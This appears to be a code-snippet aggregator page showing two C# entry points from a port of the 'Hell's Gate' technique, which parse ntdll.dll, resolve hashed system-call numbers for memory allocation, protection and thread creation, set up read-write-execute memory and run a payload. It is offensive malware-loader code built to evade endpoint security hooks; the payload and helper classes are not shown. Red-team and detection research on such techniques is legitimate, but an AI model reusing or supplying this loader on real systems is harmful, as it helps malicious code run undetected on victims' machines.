Exemplo n.º 1
0
        /// <summary>
        /// Entry point of the program.
        /// </summary>
        /// <param name="args">Command line arguments.</param>
        static void Main(string[] args)
        {
            Util.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
            Util.LogInfo("C# Implementation of the Hell's Gate VX Technique");
            Util.LogInfo("   --------------------------------------------------\n", 0, "");

            // Only works for x86
            if (IntPtr.Size != 8)
            {
                Util.LogError("Project only tested in x64 context.\n");
                return;
            }

            // Load the module and get everything ready
            SystemModule ntdll = new SystemModule("ntdll.dll");

            ntdll.LoadAllStructures();

            // Resolve all the system calls
            Dictionary <UInt64, Util.APITableEntry> APITable = new Dictionary <ulong, Util.APITableEntry>()
            {
                { Util.NtAllocateVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtAllocateVirtualMemoryHash) },
                { Util.NtProtectVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtProtectVirtualMemoryHash) },
                { Util.NtCreateThreadExHash, ntdll.GetAPITableEntry(Util.NtCreateThreadExHash) },
                { Util.NtWaitForSingleObjectHash, ntdll.GetAPITableEntry(Util.NtWaitForSingleObjectHash) }
            };

            ntdll.Dispose();

            Util.LogInfo($"NtAllocateVirtualMemory: 0x{APITable[Util.NtAllocateVirtualMemoryHash].Syscall:x4}");
            Util.LogInfo($"NtProtectVirtualMemory:  0x{APITable[Util.NtProtectVirtualMemoryHash].Syscall:x4}");
            Util.LogInfo($"NtWaitForSingleObject:   0x{APITable[Util.NtWaitForSingleObjectHash].Syscall:x4}");
            Util.LogInfo($"NtCreateThreadEx:        0x{APITable[Util.NtCreateThreadExHash].Syscall:x4}\n");

            HellsGate gate = new HellsGate(APITable);

            gate.GenerateRWXMemorySegment();
            gate.Payload();
            return;
        }
Exemplo n.º 2
0
        } = 0x00004500 | 0x00000050;                                             // PE00

        static void Main(string[] args)
        {
            Generic.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
            Generic.LogInfo("C# Implementation of the Hell's Gate VX Technique");
            Console.WriteLine("   --------------------------------------------------\n");

            // Only tested on x86
            if (IntPtr.Size != 8)
            {
                Generic.LogError("Project only tested in x64 context.\n");
                return;
            }

            // Get module
            if (!File.Exists(Environment.SystemDirectory + "\\ntdll.dll"))
            {
                Generic.LogError("Unable to find NTDLL module.\n");
                return;
            }
            MemoryUtil MemUtil = new MemoryUtil(File.ReadAllBytes(Environment.SystemDirectory + "\\ntdll.dll"));

            // Get DOS HEADER
            Win32.IMAGE_DOS_HEADER ImageDOSHeader = MemUtil.GetStructureFromBlob <Win32.IMAGE_DOS_HEADER>(0);
            if (ImageDOSHeader.Equals(default(Win32.IMAGE_DOS_HEADER)) || ImageDOSHeader.e_magic != IMAGE_DOS_SIGNATURE)
            {
                Generic.LogError("Invalid DOS Header.");
                return;
            }

            // Get NT Headers
            Win32.IMAGE_NT_HEADERS64 ImageNTHeaders = MemUtil.GetStructureFromBlob <Win32.IMAGE_NT_HEADERS64>(ImageDOSHeader.e_lfanew);
            if (ImageNTHeaders.Equals(default(Win32.IMAGE_NT_HEADERS64)) || ImageNTHeaders.Signature != IMAGE_NT_SIGNATURE)
            {
                Generic.LogError("Invalid NT Headers.");
                return;
            }

            // Sections
            Win32.IMAGE_SECTION_HEADER        ImageSection        = new Win32.IMAGE_SECTION_HEADER();
            List <Win32.IMAGE_SECTION_HEADER> ImageSectionHeaders = new List <Win32.IMAGE_SECTION_HEADER>(ImageNTHeaders.FileHeader.NumberOfSections);

            for (int cx = 0; cx < ImageNTHeaders.FileHeader.NumberOfSections; cx++)
            {
                long iSectionOffset = Generic.GetSectionOffset(ImageDOSHeader.e_lfanew, ImageNTHeaders.FileHeader.SizeOfOptionalHeader, cx);

                ImageSection = MemUtil.GetStructureFromBlob <Win32.IMAGE_SECTION_HEADER>(iSectionOffset);
                if (!ImageSection.Equals(default(Win32.IMAGE_SECTION_HEADER)))
                {
                    ImageSectionHeaders.Add(ImageSection);
                }
            }

            // Get the section in which the EAT RVA points
            int  ivaImageExportTable        = ImageNTHeaders.OptionalHeader.DataDirectory[0].VirtualAddress;
            long OffsetImageExportDirectory = Generic.ConvertRvaToOffset(ivaImageExportTable, ImageSectionHeaders);

            Win32.IMAGE_EXPORT_DIRECTORY ImageExportDirectory = MemUtil.GetStructureFromBlob <Win32.IMAGE_EXPORT_DIRECTORY>(OffsetImageExportDirectory);
            if (ImageExportDirectory.Equals(default(Win32.IMAGE_EXPORT_DIRECTORY)))
            {
                Generic.LogError("Invalid EAT.");
                return;
            }

            // Parse all functions
            long PtrToFunctionNames = Generic.ConvertRvaToOffset(ImageExportDirectory.AddressOfNames, ImageSectionHeaders);
            long PtrToFunctions     = Generic.ConvertRvaToOffset(ImageExportDirectory.AddressOfFunctions, ImageSectionHeaders);

            // Load the table
            VxTable Table = new VxTable();

            Table.NtAllocateVirtualMemory.Hash = 0xf5bd373480a6b89b;
            Generic.GetVxTableEntry(ref MemUtil, ref Table.NtAllocateVirtualMemory, ref ImageSectionHeaders, PtrToFunctions, PtrToFunctionNames, ImageExportDirectory.NumberOfNames);
            Generic.LogInfo($"NtAllocateVirtualMemory: 0x{Generic.HighLowToSystemCall(Table.NtAllocateVirtualMemory):x4}");

            Table.NtCreateThreadEx.Hash = 0x64dc7db288c5015f;
            Generic.GetVxTableEntry(ref MemUtil, ref Table.NtCreateThreadEx, ref ImageSectionHeaders, PtrToFunctions, PtrToFunctionNames, ImageExportDirectory.NumberOfNames);
            Generic.LogInfo($"NtCreateThreadEx:        0x{Generic.HighLowToSystemCall(Table.NtCreateThreadEx):x4}");

            Table.NtProtectVirtualMemory.Hash = 0x858bcb1046fb6a37;
            Generic.GetVxTableEntry(ref MemUtil, ref Table.NtProtectVirtualMemory, ref ImageSectionHeaders, PtrToFunctions, PtrToFunctionNames, ImageExportDirectory.NumberOfNames);
            Generic.LogInfo($"NtProtectVirtualMemory:  0x{Generic.HighLowToSystemCall(Table.NtProtectVirtualMemory):x4}");

            Table.NtWaitForSingleObject.Hash = 0xc6a2fa174e551bcb;
            Generic.GetVxTableEntry(ref MemUtil, ref Table.NtWaitForSingleObject, ref ImageSectionHeaders, PtrToFunctions, PtrToFunctionNames, ImageExportDirectory.NumberOfNames);
            Generic.LogInfo($"NtWaitForSingleObject:   0x{Generic.HighLowToSystemCall(Table.NtWaitForSingleObject):x4}\n");

            // Execute payload
            MemUtil.Dispose();
            HellsGate gate = new HellsGate(Table);

            gate.Payload();
        }